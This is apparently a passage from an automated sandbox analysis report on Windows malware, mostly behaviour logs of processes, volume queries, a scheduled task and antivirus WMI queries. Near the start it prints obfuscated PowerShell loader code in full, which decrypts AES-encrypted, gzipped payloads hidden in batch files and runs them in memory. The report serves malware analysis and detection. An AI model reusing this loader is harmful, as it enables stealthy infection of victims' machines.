+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+''+[char](78)+''+'a'+''+'m'+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+[char](101)+''+[char](66)+''+[char](121)+'si'+'g'+','+[char](80)+''+[char](117)+'b'+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$uiloijomlvxjkf).setimplementationflags('ru'+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+','+'m'+''+[char](97)+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$nmmwpnxadvf.definemethod(''+'i'+''+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+'c'+''+[char](44)+'h'+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+'slo'+'t'+','+[char](86)+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qydjyvedmn,$uiloijomlvxjkf).setimplementationflags(''+'r'+'u'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $nmmwpnxadvf.createtype();}$swnyxvukgpflw=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+'e'+''+[char](109)+''+'.'+'d'+'l'+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+'c'+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+'t.'+[char](87)+'i'+'n'+''+'3'+''+[char](50)+'.'+'u'+'n'+[char](115)+''+[char](97)+''+'f'+''+'e'+''+[char](78)+''+'a'+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+'o'+[char](100)+'s');$amujszcronxavl=$swny
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: dwm.exe, 0000002A.00000002.3081128578.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000000.2467392240.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138E2AF0 cpuid 19_3_00000224138E2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,19_2_0000022413908090
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.50.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
